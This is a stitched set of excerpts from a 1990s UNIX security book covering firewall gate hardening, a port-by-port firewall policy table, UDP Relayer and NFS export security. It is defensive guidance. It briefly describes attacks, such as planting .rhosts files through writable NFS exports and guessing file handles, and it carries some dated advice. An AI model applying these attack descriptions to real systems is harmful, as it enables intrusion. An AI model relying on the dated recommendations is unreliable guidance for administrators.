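A rough sketch of such a cron job follows. The spool directory is only an example, and the -amin option assumes a find that supports minute granularity (such as GNU find); with a standard find you would have to settle for a coarser -atime test:<br />

# root's crontab: every hour, remove ftpout files untouched for more than 90 minutes<br />
0 * * * * find /usr/spool/ftpout -type f -amin +90 -exec rm -f {} \;<br />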


You can create additional accounts, similar to ftpout, for users who wish to finger people on the outside.<br />

You can use a scheme exactly like the one described above for FTP to let local users use Telnet with<br />

remote sites. Do not use the same user ID and group for the telnetout account that you used for the ftpout<br />

account.<br />

Alternatively, you can create your own dedicated servers or proxies on the gate for passing finger,<br />

Telnet, and other services.<br />

21.4.5 finger<br />

Many sites using gates disable the finger service, because finger often provides too much information to<br />

outsiders about your internal filesystem structure and account-naming conventions. Unfortunately, the<br />

finger command also provides very useful information, and disabling its operation at a large site may<br />

result in considerable frustration for legitimate outside users.<br />

As an alternative, you can modify the finger service to provide a limited server that will respond with a<br />

user's mailbox name, and optionally other information such as phone number and whether or not the user<br />

is currently logged in. The output should not provide the home directory or the true account name to the<br />

outside. The output also should not provide the last login time of the account; intruders may be able to<br />

use this information to look for idle accounts.<br />
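One way to approximate such a limited service - strictly a sketch; the fingerstub script and its gateinfo data file are hypothetical names - is to have inetd hand finger connections to a small wrapper instead of the stock daemon:<br />

# /etc/inetd.conf: pass finger requests to a restricted responder<br />
finger  stream  tcp  nowait  nobody  /usr/local/etc/fingerstub  fingerstub<br />

The wrapper itself need only read the single request line and answer from a hand-maintained file of sanitized entries:<br />

#!/bin/sh<br />
# Read the request, strip the protocol's trailing carriage return, and reply only<br />
# with information that has been deliberately placed in the gateinfo file.<br />
read request<br />
request=`echo "$request" | tr -d '\015'`<br />
if [ -z "$request" ]; then<br />
    echo "Please specify a user name."<br />
else<br />
    grep -i "$request" /usr/local/etc/gateinfo 2>/dev/null || echo "No information available."<br />
fi<br />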

21.4.6 Telnet and rlogin from Remote Sites into Your Network<br />

The biggest difficulty with firewall machines arises when a user is offsite and wishes to log in to his or<br />

her account via the network. After all, remote logins are exactly what the gate is designed to prevent! If<br />

such logins are infrequent, you can create a temporary account on the gate with a random name and<br />

random password that cannot be changed by the user. The account does not have a shell, but instead<br />

executes a shell script that does an rlogin to the user's real account. The user must not be allowed to<br />

change the password on this gate account, and must be forbidden from installing the account name in his<br />

or her local .rhosts file. For added security, be sure to delete the account after a fixed period of time -<br />

preferably a matter of days.[13]<br />

[13] Actually, consider not allowing rlogin in the first place and just using Telnet. And<br />

beware of password sniffers, who don't care if your name and password are random.<br />
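For example, the temporary account's "shell" might be nothing more than a captive script along these lines (the internal host name and user name are purely illustrative):<br />

#!/bin/sh<br />
# Captive shell for a temporary gate account: note the use, then connect the<br />
# user straight through to his or her real account on an internal machine.<br />
logger -t gate-login "temporary account used"<br />
exec rlogin office.company.com -l alice<br />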

If there are many remote users, or users who will be doing remote logins on a continuing basis, the above<br />

method will work but is unlikely to be acceptable to most users. In such a case, we recommend using the<br />

setup described above, with two changes: let users pick a gate account name that is more mnemonic, and<br />

force them to use some type of higher-security access device, such as a smart card ID, to access the gate.<br />

If passwords must be used on the gate accounts, be sure to age them frequently (once every two to four<br />

weeks), and let the machine generate the passwords to prevent users from setting the same passwords as<br />

those for their internal accounts.<br />


Chapter 21<br />

Firewalls<br />

21.5 Special Considerations<br />

To make the firewall setup effective, the gate should be a pain to use: really, all you want this computer<br />

to do is forward specific kinds of information across the choke. The gate should be as impervious as<br />

possible to security threats, applying the techniques we've described elsewhere in this book, plus more<br />

extreme measures that you would not apply to a general machine. The list below summarizes techniques<br />

you may want to implement on the gate machine:<br />

● Enable auditing if your operating system supports it.<br />

● Do not allow regular user accounts, but only accounts for people requiring incoming connections, system accounts for needed services, and the root account.<br />

● Do not allow incoming connections to your X11 servers (ports 6000 through 6000+n, where n is the number of X11 displays on any given computer).<br />

● Do not mount directories using NFS (or any other network filesystem). Export only directories that contain data files (ftp/pub, news, etc.), never programs. Export read-only.<br />

● Remove the binaries of all commands not necessary for gate operation, including tools like cc, awk, sed, ld, emacs, Perl, etc. Remove all libraries (except the shared portion of shared libraries) from /usr/lib and /lib. Program development for the gate should be done on another machine and copied to the gate machine; with program development tools and unnecessary commands removed, a cracker can't easily install Trojan horses or other nasty code. Remove /bin/csh, /bin/ksh, and all other shells except /bin/sh (which your system needs for startup). Change the permission on /bin/sh to be 500, so that it can only be run by the superuser.<br />

If you really don't want to remove these programs, chmod them from 755 to 500. The root user will still be able to use these programs, but no one else will. This approach is not as secure as removing the programs, but it is more effective than leaving the tools in place.<br />

● chmod all system directories (e.g., /, /bin, /usr, /usr/bin, /etc, /usr/spool) to mode 711. Users of the system other than the superuser do not need to list directory contents to see what is and is not present. This change will really slow down someone who manages to establish a non-root shell on the machine through some other mechanism.<br />

● Don't run NIS on the gate machine. Do not import or export NIS files, especially the alias and passwd files.<br />

● Turn on full logging on the gate machine. Read the logs regularly. Set the syslog.conf file so that the gate logs to an internal machine as well as a hardcopy device, if possible.<br />


● Mount as many disks as possible read-only. This prevents a cracker from modifying the files on those disks. Some directories, notably /usr/spool/uucp, /usr/adm, and ~ftp/pub, will need to be writable. You can place all of these directories on a single partition and use symbolic links so that they appear in the appropriate place.<br />

● Turn on process and file quotas, if available.<br />

● Use some form of smart card or key-based access for the root user. If you don't use such devices, don't allow anyone to log in as root on the machine.<br />

● Make the gate computer "equivalent" to no other machine. Remove the files /etc/hosts.equiv and /etc/hosts.lpd. (A few of the steps in this list are shown as example commands following it.)<br />

● Enable process accounting on the gate machine.<br />

● Disable all unneeded network services.<br />
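As a rough illustration of how some of these measures translate into commands - a sketch only; adjust the paths and the directory list to your own system:<br />

# Leave only /bin/sh, and make it (and any tools you keep) usable by root alone<br />
chmod 500 /bin/sh<br />
# Make system directories unlistable by anyone but the superuser<br />
chmod 711 / /bin /usr /usr/bin /etc /usr/spool<br />
# Make the gate "equivalent" to no other machine<br />
rm -f /etc/hosts.equiv /etc/hosts.lpd<br />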

Finally, look back at the guidelines listed under Chapter 17; they are also useful when setting up a gate.<br />

When you configure your gate machine, remember that every service and program that can be run<br />

presents a threat to the security of your entire protected network. Even if the programs appear safe today,<br />

bugs or security flaws may be found in them in the future. The purpose of the gate is to restrict access to<br />

your network, not to serve as a computing platform. Therefore, remove everything that's not essential to<br />

the network services.<br />

Be sure to monitor your gate on a regular basis: if you simply set the gate up and forget about it, you<br />

may let weeks or more go by before discovering a break-in. If your network is connected to the <strong>Internet</strong><br />

24 hours a day, 7 days a week, it should be monitored at least daily.<br />

Even if you follow all of these rules and closely monitor your gate, a group of very persistent and clever<br />

crackers might still break through to your machines. If they do, the cause will not likely be accidental.<br />

They will have to work hard at it, and you will most likely find evidence of the break-in soon after it<br />

occurs. The steps we've outlined will probably discourage the random or curious cracker, as well as many<br />

more serious intruders, and this is really your goal.<br />


Appendix G<br />

G. Table of IP Services<br />

Table G-1 lists the IP protocols that are commonly used on the <strong>Internet</strong>. For completeness, it also lists<br />

many protocols that are no longer used and are only of historic interest.<br />

You can use this table to help you decide which protocols you do and do not wish to support on your<br />

<strong>UNIX</strong> computers. You can also use this table to help you decide which protocols to pass or block with a<br />

screening router, as described in Chapter 21, Firewalls. For example, at most sites you will wish to block<br />

protocols such as tftp, sunrpc, printer, rlogin and rexec. Most site administrators will probably wish to<br />

allow protocols such as ftp, smtp, domain, and nntp. Other protocols can be problematical.<br />

The "Suggested Firewall Handling" column gives a sample firewall policy that should be sufficient for<br />

many sites; in some cases, footnotes provide additional explanation. We generally advise blocking all<br />

services that are not absolutely essential. The reason for this suggestion is that even simple services, such<br />

as TCP echo, can be used as a means for launching a denial of service attack against your network. These<br />

services can also be used by an attacker to learn about your internal network topology. Although these<br />

services are occasionally useful for debugging, we feel that their presence is, in general, a liability - an<br />

accident waiting to happen. Services which are not listed in this table should be blocked unless you have<br />

a specific reason for allowing them to cross your firewall. For detailed information about firewall policy<br />

and filtering, we suggest that you consult Building <strong>Internet</strong> Firewalls by D. Brent Chapman and<br />

Elizabeth D. Zwicky (<strong>O'Reilly</strong> & Associates, 1995).<br />

The "Notes" section in this table contains a brief description of the service. If the word "Sniff" appears,<br />

then this protocol may involve programs that require passwords and may be vulnerable to password<br />

sniffing; you may wish to disable it on this basis, or only use it with a one-time password system. The<br />

word "Spoof" indicates that the usual programs that use the protocol depend on IP-based authentication<br />

for its security and can be compromised with a variety of spoofing attacks. The annotation "Obsolete"<br />

appears on protocols which may no longer be in general use. Note that the absence of a "Sniff" or "Spoof"<br />

annotation does not mean that the protocol is not vulnerable to such attacks.<br />

The "Site Notes" column is a place where you can make your own notes about what you plan to do at<br />

your site.<br />

NOTE: This is not a comprehensive list of TCP and UDP services; instead, it is a list of the<br />

services that are most commonly found on <strong>UNIX</strong>-based computers. If you have computers<br />

on your network that are running operating systems other than <strong>UNIX</strong>, you may wish to pass<br />

packets that use ports not discussed here. A complete list of all assigned port numbers can<br />


be found in RFC 1700 (or its successors).<br />

In addition to the services noted in the table, you should block all IP addresses coming from outside your<br />

network which claim to come from inside your network. That is, any packet coming into your network<br />

with a source IP address that indicates it is from your network should be discarded.<br />
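On a Cisco-style screening router, this anti-spoofing rule might look something like the following sketch (the internal network number is illustrative, and a real choke would of course carry a much longer rule set than the single permit shown here):<br />

! Discard anything arriving from the outside that claims an inside source address<br />
access-list 101 deny ip 192.168.7.0 0.0.0.255 any<br />
access-list 101 permit ip any any<br />
interface serial 0<br />
 ip access-group 101 in<br />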

IP packets with unusual option bits or invalid combinations of option bits should be blocked. This should<br />

probably include packets with source routing or record-route options set.<br />

Fragmented packets should be blocked if the offset for reassembly specifies a zero offset (that would<br />

cause the reassembly to rewrite the IP header). [1]<br />

[1] The idea for this table is based, in part, on Appendix B of the book<br />

Firewalls and Internet Security, by William R. Cheswick and Steven M. Bellovin<br />

(Addison-Wesley, 1994).<br />

Table G.1: Common TCP and UDP Services, by Port<br />

| Port | Protocol | Name | Notes | Suggested Firewall Handling | Site Notes |<br />
| --- | --- | --- | --- | --- | --- |<br />
| 1 | TCP | tcpmux | TCP port multiplexer. Rarely used. | Block | |<br />
| 7 | UDP, TCP | echo | Echoes UDP packets and characters sent down TCP streams. | Block[2] | |<br />
| 9 | UDP, TCP | discard | Accepts connections, but discards the data. | Block | |<br />
| 11 | TCP | systat | System status - reports the active users on your system. Some systems connect this to who. | Block | |<br />
| 13 | UDP, TCP | daytime | Time of day in human-readable form. | Block[3] | |<br />
| 15 | TCP | netstat | Network status, human-readable. Obsolete (officially unassigned as of 10/94). | Block | |<br />
| 17 | UDP | qotd | Quote of the day. | Block | |<br />
| 19 | UDP, TCP | chargen | Character generator. | Block | |<br />
| 20, 21 | TCP | ftp-data, ftp | Data and command ports for FTP. Sniff. | Requires special handling. | |<br />
| 23 | TCP | telnet | Telnet virtual terminal. Sniff. | Be careful.[4] | |<br />
| 24 | UDP, TCP | | For use by private email systems. | Block | |<br />
| 25 | TCP | smtp | Email. | Allow to your firewall gate or bastion host. | |<br />
| 37 | UDP, TCP | time | Time of day, in machine-readable form. | Block | |<br />
| 38 | UDP, TCP | rap | Route Access Protocol. | Block | |<br />
| 42 | UDP, TCP | name | Host Name Server. Obsolete. | Block | |<br />
| 43 | TCP | whois | Normally only run by NICs. | Outbound only or Block. | |<br />
| 48 | UDP, TCP | auditd | Digital Equipment Corporation audit daemon. | Block | |<br />
| 49 | UDP | tacacs | Sniff. Spoof. | Block. You should place your tacacs authentication servers on the same side of your firewall as your terminal concentrators. | |<br />
| 53 | UDP, TCP | domain | Domain Name Service. Spoof. | Run separate nameservers for internal and external use. If you use firewall proxies, then you only need to provide DNS service on your firewall computer. | |<br />
| 67, 68 | UDP | bootp | Boot protocol. | Block | |<br />
| 69 | UDP | tftp | Trivial FTP. | Block | |<br />
| 70 | TCP | gopher, gopher+ | Text-based information service. Sniff. | Outbound access with proxies. Inbound connections only to an organizational gopher server running on a special host. | |<br />
| 79 | TCP | finger | Return information about a particular user account or machine. | Outbound only.[5] (You may wish to refer inbound finger queries to a particular message.) | |<br />
| 80 | TCP | http | World Wide Web. Sniff. Spoof. | Outbound access with proxies. Inbound connections only to an organizational WWW server running on a special host. | |<br />
| 87 | TCP | link | | Block | |<br />
| 88 | UDP | kerberos | Distributed authentication mechanism. | Block unless you need inter-realm authentication. | |<br />
| 94 | UDP, TCP | objcall | Tivoli Object Dispatcher. | Block | |<br />
| 95 | TCP | supdup | Virtual terminal similar to Telnet, rarely used. Sniff. | Block | |<br />
| 109 | TCP | pop-2 | Post Office Protocol, allows reading mail over Internet. Sniff. | Block unless there is a specific need to access email through firewall. Consider using APOP, which is not susceptible to password sniffing. If you do pass this service, pass inbound connections only to your email host. | |<br />
| 110 | TCP | pop-3 | Better Post Office Protocol. Sniff. | | |<br />
| 111 | UDP, TCP | sunrpc | Sun RPC portmapper. Spoof.[6] | Block | |<br />
| 113 | TCP | auth | TCP authentication service. Identifies the username belonging to a TCP connection. Spoof. | Limit or block incoming requests.[7] | |<br />
| 119 | TCP | nntp | Network News Transport Protocol. | Block with exceptions.[8] | |<br />
| 121 | UDP, TCP | erpc | Encore Expedited Remote Procedure Call. | Block | |<br />
| 123 | UDP, TCP | ntp | Network Time Protocol. Spoof. | Block with exceptions.[9] | |<br />
| 126 | UDP, TCP | unitary | Unisys Unitary Login. | Block | |<br />
| 127 | UDP, TCP | locus-con | Locus PC-Interface Conn Server. | Block | |<br />
| 130 | UDP, TCP | cisco-fna | Cisco FNATIVE. | Block with exceptions. | |<br />
| 131 | UDP, TCP | cisco-tna | Cisco TNATIVE. | Block with exceptions. | |<br />
| 132 | UDP, TCP | cisco-sys | Cisco SYSMAINT. | Block with exceptions. | |<br />
| 137 | UDP, TCP | netbios-ns | NETBIOS Name Service. | Block NETBIOS unless there is a specific host with which you need to exchange NETBIOS information. NETBIOS over TCP/IP is best handled with encrypted tunneling. | |<br />
| 138 | UDP, TCP | netbios-dgm | NETBIOS Datagram Service. | | |<br />
| 139 | UDP, TCP | netbios-ssn | NETBIOS Session Service. | | |<br />
| 144 | UDP, TCP | news | Sun NeWS (Network Window System). Possibly Sniff. Spoof. Obsolete. | Block | |<br />
| 156 | UDP, TCP | sqlsrv | SQL Service. Sniff. | Block | |<br />
| 161 | UDP, TCP | snmp | Simple Network Management Protocol agents. Spoof. Sniff. | Block | |<br />
| 162 | UDP, TCP | snmptrap | SNMP traps. | Block under most circumstances, although you may wish to allow traps from an external gateway to reach your internal network monitors. | |<br />
| 177 | UDP, TCP | xdmcp | X Display Manager (XDM) Control Protocol. Sniff. Possibly Spoof. | Block. You may wish to allow outgoing connections in special circumstances. | |<br />
| 178 | UDP, TCP | NSWS | NEXTSTEP Window Server. Possibly Sniff. Spoof. | Block | |<br />
| 194 | UDP, TCP | irc | Internet Relay Chat Protocol. | Block | |<br />
| 199 | UDP, TCP | smux | SMUX (IBM). | Block | |<br />
| 200 | UDP, TCP | src | IBM System Resource Controller. | Block | |<br />
| 201 | UDP, TCP | at-rtmp | AppleTalk Routing Maintenance. | Block AppleTalk unless there is a specific host or network with which you need to exchange AppleTalk information. AppleTalk over TCP/IP is best handled through encrypted tunneling. | |<br />
| 202 | UDP, TCP | at-nbp | AppleTalk Name Binding. | | |<br />
| 203 | UDP, TCP | at-3 | AppleTalk Unused. | | |<br />
| 204 | UDP, TCP | at-echo | AppleTalk Echo. | | |<br />
| 205 | UDP, TCP | at-5 | AppleTalk Unused. | | |<br />
| 206 | UDP, TCP | at-zis | AppleTalk Zone Information. | | |<br />
| 207 | UDP, TCP | at-7 | AppleTalk Unused. | | |<br />
| 208 | UDP, TCP | at-8 | AppleTalk Unused. | | |<br />
| 210 | TCP | wais | WAIS server. Sniff. | Block unless you run a server. | |<br />
| 220 | TCP | imap | POP replacement. Sniff. | Block unless there is a specific need to access email through the firewall. If you do pass this service, pass inbound connections only to your email host. | |<br />
| 387 | TCP | avrp | AppleTalk Routing. | Block | |<br />
| 396 | UDP, TCP | netware-ip | Novell Netware over IP. Sniff. | Block | |<br />
| 411 | UDP, TCP | rmt | Remote Tape. | Block | |<br />
| 512 | UDP | biff | Real-time mail notification. | Block | |<br />
| 512 | TCP | exec | Remote command execution. Sniff. Spoof. | Block | |<br />
| 513 | UDP | rwho | Remote who command. | Block | |<br />
| 513 | TCP | login | Remote login. Sniff. Spoof. | These protocols are vulnerable to problems with "trusted hosts" and .rhosts files. Block them if at all possible. | |<br />
| 514 | TCP | shell | rsh. Sniff. Spoof. | | |<br />
| 514 | UDP | syslog | syslog logging. | Block | |<br />
| 515 | TCP | printer | Berkeley lpr system. Spoof. | Block | |<br />
| 517 | UDP | talk | Initiate talk requests. | You should probably block these protocols for incoming and outgoing use. If you wish to permit your users to receive talk requests from outside sites, then you must allow user machines to receive TCP connections on any TCP/IP port over 1024. The protocols further require that both hostnames and usernames of your internal users be made available to outsiders. talk can further be used to harass users. | |<br />
| 518 | UDP | ntalk | Initiate talk requests. | | |<br />
| 520 | UDP | route | Routing control. Spoof. | Block | |<br />
| 523 | UDP, TCP | timed | Time server daemon. Spoof. | Block | |<br />
| 532 | UDP, TCP | netnews | Remote readnews. | Block | |<br />
| 533 | UDP, TCP | netwall | Network Write to all users. | Block | |<br />
| 540 | TCP | uucp | Used mostly for sending batches of Usenet news. Sniff. Spoof. | Block unless there are specific hosts with which you wish to exchange UUCP information. | |<br />
| 550 | UDP, TCP | nrwho | New rwho. | Block | |<br />
| 566 | UDP, TCP | remotefs | RFS remote filesystem. Sniff. Spoof. | Block | |<br />
| 666 | TCP | mdqs | Replacement for Berkeley's printer system. | Block | |<br />
| 666 | UDP, TCP | doom | Doom game. | Block | |<br />
| 744 | TCP | FLEXlm | FLEX license manager. | Block | |<br />
| 754 | TCP | tell | Used by send. | Block | |<br />
| 755 | UDP | securid | Security Dynamics ACE/Server. Sniff.[10] | Block | |<br />
| 765 | TCP | webster | Dictionary service. | Block | |<br />
| 1025 | TCP | listener | System V Release 3 listener. | Block | |<br />
| 1352 | UDP, TCP | lotusnotes | Lotus Notes mail system. | Block | |<br />
| 1525 | UDP | archie | Tells you where things are on the Internet. | Block, except the specific archie servers you want to use. | |<br />
| 2000 | TCP | OpenWindows | Sun proprietary window system. | Block | |<br />
| 2049 | UDP, TCP | nfs | Sun NFS Server (usually). Spoof. | Block | |<br />
| 2766 | TCP | listen | System V listener. | Block | |<br />
| 3264 | UDP, TCP | ccmail | Lotus cc:Mail. | Block | |<br />
| 5130 | UDP | sgi-dogfight | Silicon Graphics flight simulator. | Block | |<br />
| 5133 | UDP | sgi-bznet | Silicon Graphics tank demo. | Block | |<br />
| 5500 | UDP | securid | Security Dynamics ACE/Server version 2. Sniff.[11] | Block | |<br />
| 5510 | TCP | securidprop | Security Dynamics ACE/Server slave. Sniff.[12] | Block | |<br />
| 5701 | TCP | xtrek | X11 xtrek. | Block | |<br />
| 6000 thru 6063 | TCP | x-server | X11 server. Sniff. Spoof. | Block | |<br />
| 6667 | TCP | irc | Internet Relay Chat. | Block | |<br />
| 7000 thru 7009 | UDP, TCP | afs | Andrew File System. Spoof. | Block | |<br />
| 7100 | TCP | font-service | X Server font service. | Block | |<br />

[2] Protocols such as echo can be used to probe the internal configuration of your network.<br />

They can also be used for creative denial of service attacks.<br />

[3] As some programs use the system's real time clock as the basis of a cryptographic key,<br />

revealing this quantity on the <strong>Internet</strong> can lead to the compromise of some security-related<br />

protocols.<br />

[4] Telnet Server. Conventional Telnet may result in passwords being sniffed on the<br />

network. You may wish to only allow specially encrypted or authenticated Telnet.<br />

[5] The finger client program can be susceptible to certain kinds of data-driven attacks if<br />

you do not use a suitable finger wrapper.<br />

[6] But note that a port scan can still find RPC servers even if portmapper is blocked.<br />

[7] As discussed in the text, the values returned as part of this service are unreliable if the<br />

remote machine is not under your control.<br />

[8] Outbound and inbound NNTP connections should only be allowed to the pre-established<br />

sites with which you exchange news.<br />

[9] Allowing NTP from outside machines opens your site to time-spoofing attacks. If you<br />

must receive your time from outside your site via the <strong>Internet</strong>, only allow NTP packets from<br />

specified hosts.<br />

[10] Traffic may be encrypted, but the administrator may decide not to turn this on. Export<br />

versions (non-U.S.) do not have encryption available.<br />

[11] See note 10.<br />

[12] See note 10.<br />


Chapter 22<br />

Wrappers and Proxies<br />

22.5 UDP Relayer<br />

UDP Relayer is a program written by Tom Fitzgerald that receives UDP packets and retransmits them to<br />

other computers. Like SOCKS, it has a configuration file that allows you to specify which kinds of<br />

packets should be forwarded and which should not. Because UDP is a connectionless protocol, UDP<br />

Relayer must keep track of outgoing packets so that incoming packets can be relayed back to the proper<br />

sender. By default, UDP Relayer remembers outgoing packets for 30 minutes.<br />

At the time of this writing, UDP Relayer was in an early 0.2 Alpha release. A future release is planned,<br />

but that release may or may not occur - especially considering that SOCKS Version 5 will include<br />

support for UDP.<br />

Thus, instead of providing detailed instructions regarding the program's use, we will merely tell you how<br />

to get the program, and then refer you to the program's documentation.<br />

22.5.1 Getting UDP Relayer<br />

UDP Relayer can be freely downloaded from the <strong>Internet</strong>. The address is:<br />

ftp://ftp.wang.com/pub/fitz/udprelay-0.2.tar.Z<br />

In the 0.2 release, the file README contains information on installing the program. The file<br />

ARCHIE-NOTES contains specific information on making UDP Relayer work with Archie.<br />


Chapter 20<br />

NFS<br />

20.4 Improving NFS <strong>Sec</strong>urity<br />

There are many techniques that you can use to improve overall NFS security:<br />

1. Limit the use of NFS by limiting the machines to which filesystems are exported, and limit the number of filesystems that each client mounts.<br />

2. Export filesystems read-only if possible.<br />

3. Use root ownership of exported files and directories.<br />

4. Remove group write permissions from exported files and directories.<br />

5. Do not export the server's executables.<br />

6. Do not export home directories.<br />

7. Do not allow users to log into the server.<br />

8. Use the fsirand program, as described below.<br />

9. Set the portmon variable, so that NFS requests that are not received from privileged ports will be ignored.<br />

10. Use showmount -e to verify that you are only exporting the filesystem you wish to export to the hosts specified with the correct flags.<br />

11. Use Secure NFS.<br />

These techniques are described below.<br />

20.4.1 Limit Exported and Mounted Filesystems<br />

The best way to limit the danger of NFS is by having each computer only export and/or mount the particular filesystems that are<br />

needed.<br />

If a filesystem does not need to be exported, do not export it. If it must be exported, export it to as few machines as possible by judiciously using restrictions in the exports list. If you have a sizeable number of machines to export to and such lists are tedious to maintain, consider careful use of the netgroups mechanism, if you have it. Do not export a filesystem to any computer unless you have to. If possible, export filesystems read-only, as we'll describe in the next section.

If you only need to export part of a filesystem, then export only that part. Do not export an entire filesystem if you only need access to a particular directory.

Likewise, your clients should only mount the NFS servers that are needed. Don't simply have every client in your organization mount every NFS server. Limiting the number of mounted NFS filesystems will improve overall security, and will improve performance and reliability as well.

The above advice may seem simple, but it is advice that is rarely followed. Many organizations have configured their computers so that every server exports all of its filesystems, and so that every client mounts every exported filesystem. And the configuration gets worse: many computers on the Internet today make filesystems available without restriction to any other computer on the Internet. Usually, carelessness or ignorance is to blame: a system administrator faced with the need to allow access to a directory believes that the easiest (or only) way to provide the access is to simply enable file sharing for everybody.

Export Can Be Forever
Some versions of NFS enforce the exports file only during mount, which means that clients that mount filesystems on a server will continue to have access to those filesystems until the clients unmount the server's filesystems or until they are rebooted. Even if the client is removed from the server's exports file and the server is rebooted, the client will continue to have access and can continue to use a filesystem after unmounting it, unless the directory is no longer exported at all, or unless fsirand is run on the exported filesystem to change the generation count of each inode.

Distinguishing a file handle that is guessed from one that is returned to the client by the mount daemon is impossible. Thus, on systems where the exports are only examined upon mounting, any file on the NFS server can be accessed by an adversary who has the ability and determination to search for valid file handles.

Not too long ago, one of us watched a student in a lab in the Netherlands mount filesystems from more than 25 U.S. universities and corporations on his workstation - most with read/write access!

20.4.1.1 The example explained

In the example we presented earlier in this chapter, Example 20.1, "An /etc/dfs/dfstab file with some problems," a system administrator made three dangerous mistakes. On the third line, the administrator exported the directory /tftpboot. This directory is exported to any computer on the network that wishes to mount it; if the computer is on the Internet, then any other computer on the Internet has access to this server's /tftpboot directory.

What's the harm? First of all, users of the /tftpboot directory may not be aware that files that they place in it can be so widely accessed. Another problem arises if the directory can be written: in this case, there is a possibility that the storage space will be hijacked by software pirates and used as a "warez" repository. Perhaps worse, the software on that partition can be replaced with hacked versions that may not perform as the real owners would wish! (In this case, /tftpboot is probably used for providing bootstrap code to machines on the network. By modifying this code, a resourceful attacker could force arbitrary computers to run password sniffers, erase their hard drives, or do other unwanted things.)

The last two lines of the sample configuration file have a similar problem: they export the directories /usr/lib/X11/ncd and /usr/openwin freely over the network. Although the directories are exported read-only, there is still a chance that a software pirate could use the exported filesystems to obtain copies of copyrighted software. This scenario could create a legal liability for the site running the NFS server.

You can make your server more secure by exporting filesystems only to the particular computers that need to use them. Don't export filesystems that don't have to be exported. And don't export filesystems to the entire Internet - otherwise you will only be asking for trouble.

Here is a revised dfstab file that is properly configured:

    # place share(1M) commands here for automatic execution
    # on entering init state 3.
    #
    # This configuration is more secure.
    #
    share -F nfs -o rw=red:blue:green /cpg
    share -F nfs -o rw=clients -d "spool" /var/spool
    share -F nfs -o ro=clients /tftpboot
    share -F nfs -o ro=clients /usr/lib/X11/ncd
    share -F nfs -o ro=clients /usr/openwin

NOTE: Be aware that the options on export commands and configuration files have different semantics under SVR4 and earlier, BSD-like systems (including SunOS). Under earlier BSD-like systems, the -ro option does not take hostnames as parameters, and there is an -access option to limit access. If you specified an export list under SunOS such as in the above example:

    exportfs -i -o rw=clients /var/spool

then the directory is exported read/write to the members of the clients netgroup, but it is also exported read-only to everyone else on the network! You must also specify the -access option with the -rw option to limit the scope of the export. Thus, to prevent other machines from reading exported files, you must use the following command:

    exportfs -i -o rw=clients,access=clients /var/spool

Under SVR4, both the -rw and -ro options can take a host list to restrict the export of the files. The directory is exported only to the hosts named in the union of the two lists. There is no -access option in SVR4.
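Whichever flavor of export syntax your system uses, it is worth checking the result afterwards with showmount -e (technique 10 in the list at the start of this section). A minimal sketch, using the hostnames and netgroup from the revised dfstab above (the exact output format varies from vendor to vendor):

    % showmount -e server
    export list for server:
    /cpg              red,blue,green
    /var/spool        clients
    /tftpboot         clients
    /usr/lib/X11/ncd  clients
    /usr/openwin      clients

If a filesystem shows up with an access list of "(everyone)", or is exported to hosts you did not intend, correct the exports file or dfstab and re-export before going any further.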

20.4.2 Export Read-only

Many filesystems contain information that is only read, never (or rarely) written. These filesystems can be exported read-only. Exporting the filesystems read-only adds to both security and reliability: it prevents the filesystems from being modified by NFS clients, limiting the damage that can be done by attackers, ignorant users, and buggy software.

Many kinds of filesystems are candidates for read-only export:

● Filesystems containing applications

● Organizational reference matter, such as policies and documents

● Netnews (if you do not read news with NNTP)

If you have programs or other files that must be exported read-write, you can improve your system's overall performance, reliability, and security by placing these items on their own filesystem that is separately exported.

To export a filesystem read-only, specify the ro=clients option in either your exports file or your dfstab file (depending on which version of UNIX you are using). In the following example, the /LocalLibrary directory is exported read-only:

    share -F nfs -o ro=clients /LocalLibrary

20.4.3 Use Root Ownership

Because the NFS server maps root to nobody, you can protect files and directories on your server by setting their owner to root and their protection mode to 755 (in the case of programs and directories) or 644 (in the case of data files). This setup will prevent the contents of the files from being modified by a client machine.

If you have information on an NFS server that should not be accessible to NFS clients, you can use the file protection mode 700 (in the case of programs and directories) or 600 (in the case of data files). However, a better strategy is not to place the files on the NFS server in the first place.

Remember, this system protects only files on the server that are owned by root. Also, this technique does not work if you have patched your kernel to set the value of nobody to 0, or if you export the filesystems to a particular host with the -root= option.
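As a minimal illustration of setting up such ownership and permissions on an exported tree (the directory name is only an example):

    # chown -R root /LocalLibrary      Make root the owner of the exported files
    # chmod -R go-w /LocalLibrary      Remove write permission for group and other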

NOTE: Protecting an executable file to be execute-only will not work as you expect in an NFS environment. Because you must read a file into memory before it can be executed, any file marked executable can also be read from a server using NFS commands (although it may not be possible to do so using standard calls through a client). The server has no way of knowing whether a read request is a prelude to execution or not. Thus, putting execute-only files on an exported partition may allow them to be examined or copied from a client machine.

20.4.4 Remove Group-write Permission for Files and Directories

If you are using standard AUTH_UNIX authentication with NFS, then users can effectively place themselves in any group. Thus, to protect files and directories that are owned by root, they must not be group-writable.
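A quick way to spot any group-writable entries that have crept onto an exported filesystem is a find sweep; the path is again only an example:

    # find /LocalLibrary -perm -020 -print    List entries whose group-write bit is set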

20.4.5 Do Not Export Server Executables

If your server is running the same operating system on the same CPU architecture as your client computers, then you might be tempted to have the server export its own executables (such as the programs stored in /bin, /usr/bin, and /etc) for use by the clients. Don't do so without careful thought about the consequences.

At first, exporting a server's own executables seems like a good way to save disk space: this way, you only need to have one copy of each program, which is then shared between the clients and the servers, rather than two copies.

But exporting your server's executables poses several security problems:

● It allows an attacker to easily determine which version of each executable your server is running, which enables the attacker to probe for weak spots with greater ease.

● If there is an error in your system's configuration, you may be exporting the binaries on a writable filesystem. An attacker could then modify the server's own binaries, and possibly break in (or at least cause you serious problems).

You can minimize the need for exporting server binaries by using the dataless client configuration that is available on some versions of UNIX. In this case, "dataless" means that each client computer maintains a complete copy of all of its executable files, but stores all of its data that is subject to change on a central server.

If you simply must export the server's binaries, then export the filesystem read-only.

20.4.6 Do Not Export Home Directories

If you export a filesystem that has users' home directories on it and you do not use Secure RPC, then all other clients mounting that directory, as well as the server itself, can be placed at risk.

If you export a filesystem that contains users' home directories, then there is a risk that an attacker could alter the information stored on the NFS server. This is normally a serious risk in itself. However, if the partition being exported includes users' home directories, then one of the things that an attacker can do is create files in the users' home directories.

A simple attack is for an attacker to create a .rhosts file in a user's home directory that specifically allows access to the attacker. Having created this file, the attacker could now log onto the server and proceed to look for additional security holes. Perhaps the greatest danger in this attack is that it can be aimed against system accounts (such as daemon and bin) as easily as accounts used by human users.

Likewise, you should avoid exporting filesystems that contain world-writable directories (e.g., /tmp, /usr/tmp, /usr/spool/uucppublic).

20.4.7 Do Not Allow Users to Log into the Server

